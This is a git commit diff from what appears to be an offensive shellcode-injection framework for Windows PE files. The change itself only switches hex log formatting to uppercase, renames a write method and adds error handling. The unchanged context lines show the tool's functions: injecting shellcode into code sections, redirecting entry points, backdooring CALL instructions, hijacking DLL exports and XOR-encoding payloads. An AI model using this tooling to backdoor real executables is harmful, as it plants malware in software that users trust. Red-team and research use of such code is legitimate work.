refactor: :x -> :X

2026-06-02 17:27:10 +00:00 · 2024-03-04 18:32:41 +00:00
parent 9a9297e150
commit dacef30bb0
6 changed files with 23 additions and 18 deletions
@@ -75,7 +75,7 @@ class ExeHost():
        self.code_section = pehelper.get_code_section(self.superpe.pe)
        self.code_virtaddr = self.code_section.VirtualAddress
        self.code_size = self.code_section.Misc_VirtualSize
-        logger.info("---[ Injectable: Chosen code section: {} at 0x{:x} size: {}".format(
+        logger.info("---[ Injectable: Chosen code section: {} at 0x{:X} size: {}".format(
            self.code_section.Name.decode().rstrip('\x00'),
            self.code_virtaddr,
            self.code_size))
@@ -46,7 +46,7 @@ Code section size : {sect_size}
 ''')

        offset = int((sect_size - len(self.shellcodeData)) / 2)
-        logger.debug(f'Inserting shellcode into 0x{offset:x} offset.')
+        logger.debug(f'Inserting shellcode into 0x{offset:X} offset.')

        self.superpe.pe.set_bytes_at_offset(offset, self.shellcodeData)
        self.shellcodeOffset = offset
@@ -66,7 +66,7 @@ Trailing {sect_name} bytes:
 {hexdump(self.superpe.pe.get_data(self.superpe.pe.get_rva_from_offset(p)), p, 64)}
 ''', '\t')

-        logger.info(f'Shellcode injected into existing code section at RVA 0x{rva:x}')
+        logger.info(f'Shellcode injected into existing code section at RVA 0x{rva:X}')
        logger.debug(graph)
        return True

@@ -76,7 +76,7 @@ Trailing {sect_name} bytes:
            rva = self.superpe.pe.get_rva_from_offset(self.shellcodeOffset)
            self.superpe.set_entrypoint(rva)

-            logger.info(f'Address Of Entry Point changed to: RVA 0x{rva:x}')
+            logger.info(f'Address Of Entry Point changed to: RVA 0x{rva:X}')
            return True

        elif self.runMode == InjectStyle.BackdoorCallInstr:
@@ -114,7 +114,7 @@ Trailing {sect_name} bytes:
            if export[1].lower() == exportName.lower():

                addr = self.superpe.pe.DIRECTORY_ENTRY_EXPORT.symbols[export[0]].address
-                logger.info(f'Found DLL Export "{exportName}" at RVA 0x{addr:x} . Attempting to hijack it...')
+                logger.info(f'Found DLL Export "{exportName}" at RVA 0x{addr:X} . Attempting to hijack it...')
                return addr

        return -1
@@ -188,7 +188,7 @@ Trailing {sect_name} bytes:
        while reg2 == reg:
            reg2 = random.choice(registers).upper()

-        enc, count = ks.asm(f'MOV {reg}, 0x{self.shellcodeAddr:x}')
+        enc, count = ks.asm(f'MOV {reg}, 0x{self.shellcodeAddr:X}')
        for instr2 in cs.disasm(bytes(enc), 0):
            addrOffset = len(instr2.bytes) - instr2.addr_size
            break
@@ -197,7 +197,7 @@ Trailing {sect_name} bytes:
        found |= instr.mnemonic.lower() == 'call'

        if found:
-            logger.info(f'Backdooring entry point {instr.mnemonic.upper()} instruction at 0x{instr.address:x} into:')
+            logger.info(f'Backdooring entry point {instr.mnemonic.upper()} instruction at 0x{instr.address:X} into:')

            jump = random.choice([
                f'CALL {reg}',
@@ -211,7 +211,7 @@ Trailing {sect_name} bytes:
                #f'PUSH {reg} ; RET',
            ])

-            trampoline = f'MOV {reg}, 0x{self.shellcodeAddr:x} ; {jump}'
+            trampoline = f'MOV {reg}, 0x{self.shellcodeAddr:X} ; {jump}'

        for ins in trampoline.split(';'):
            logger.info(f'\t{ins.strip()}')
@@ -161,7 +161,7 @@ class SuperPe():
        # SizeOfBlock
        self.pe.set_dword_at_rva(addr + relocsSize + 4, sizeOfReloc)

-        logger.info(f'Adding {len(relocs)} relocations for Page RVA 0x{pageRva:x} - size of block: 0x{sizeOfReloc:x}')
+        logger.info(f'Adding {len(relocs)} relocations for Page RVA 0x{pageRva:X} - size of block: 0x{sizeOfReloc:X}')

        i = 0
        for reloc in relocs:
@@ -170,7 +170,7 @@ class SuperPe():

            relocWord = (reloc_type | reloc_offset)
            self.pe.set_word_at_rva(relocDirRva + relocsSize + 8 + i * 2, relocWord)
-            logger.info(f'\tReloc{i} for addr 0x{reloc:x}: 0x{relocWord:x} - 0x{reloc_offset:x} - type: {imageBaseRelocType}')
+            logger.info(f'\tReloc{i} for addr 0x{reloc:X}: 0x{relocWord:X} - 0x{reloc_offset:X} - type: {imageBaseRelocType}')
            i += 1


@@ -183,9 +183,9 @@ class SuperPe():
        self.pe.OPTIONAL_HEADER.AddressOfEntryPoint = entrypoint


-    def write(self, outfile: str):
+    def write_pe_to_file(self, outfile: str):
        self.pe.write(outfile)
-    
+
    
    def disasmBytes(self, cs, ks, disasmData, startOffset, length, callback = None, maxDepth = 5):
        return self._disasmBytes(cs, ks, disasmData, startOffset, length, callback, maxDepth, 1)
@@ -213,7 +213,7 @@ class SuperPe():
                operand = instr.operands[0]

                if operand.type == capstone.CS_OP_IMM:
-                    logger.debug('\t' * (depth+1) + f' -> OP_IMM: 0x{operand.value.imm:x}')
+                    logger.debug('\t' * (depth+1) + f' -> OP_IMM: 0x{operand.value.imm:X}')
                    logger.debug('')

                    if callback:
@@ -45,7 +45,7 @@ def merge_loader_payload(
        pass
    elif decoder_style == DecoderStyle.XOR_1:
        xor_key = config.xor_key
-        logger.info("---[ XOR payload with key 0x{:x}".format(xor_key))
+        logger.info("---[ XOR payload with key 0x{:X}".format(xor_key))
        payload_data = bytes([byte ^ xor_key for byte in payload_data])

    logger.info("---[ Size: Stager: {} and Payload: {}  Sum: {} ".format(
@@ -58,7 +58,7 @@ def inject_exe(
    if True:
        injected_fix_data(superpe, project.carrier, project.exe_host)

-    superpe.write(exe_out)
+    superpe.write_pe_to_file(exe_out)

    # verify and log
    shellcode = file_readall_binary(shellcode_in)
@@ -86,7 +86,7 @@ def injected_fix_iat(superpe: SuperPe, carrier: Carrier, exe_host: ExeHost):
        
        offset_from_code = code.index(iatRequest.placeholder)
        instruction_virtual_address = offset_from_code + exe_host.image_base + exe_host.code_virtaddr
-        logger.info("    Replace {} at VA 0x{:x} with call to IAT at VA 0x{:x}".format(
+        logger.info("    Replace {} at VA 0x{:X} with call to IAT at VA 0x{:X}".format(
            iatRequest.placeholder.hex(), instruction_virtual_address, destination_virtual_address
        ))
        jmp = assemble_and_disassemble_jump(
@@ -147,7 +147,7 @@ def injected_fix_data(superpe: SuperPe, carrier: Carrier, exe_host: ExeHost):
        offset_from_datasection = code.index(datareuse_fixup.randbytes)
        instruction_virtual_address = offset_from_datasection + exe_host.image_base + exe_host.code_virtaddr
        destination_virtual_address = datareuse_fixup.addr
-        logger.info("    Replace {} at VA 0x{:x} with .rdata LEA at VA 0x{:x}".format(
+        logger.info("    Replace {} at VA 0x{:X} with .rdata LEA at VA 0x{:X}".format(
            datareuse_fixup.randbytes.hex(), instruction_virtual_address, destination_virtual_address
        ))
        lea = assemble_lea(
@@ -197,7 +197,12 @@ def start(settings: Settings):
        shutil.move(main_shc_file + ".sgn", main_shc_file)

    # inject merged loader into an exe
-    phases.injector.inject_exe(main_shc_file, settings, project)
+    try:
+        phases.injector.inject_exe(main_shc_file, settings, project)
+    except PermissionError as e:
+        logger.error(f'Error writing file: {e}')
+        return exit(2)
+    
    observer.add_code("exe_final", extract_code_from_exe_file_ep(settings.inject_exe_out, 300))

    # Start/verify it at the end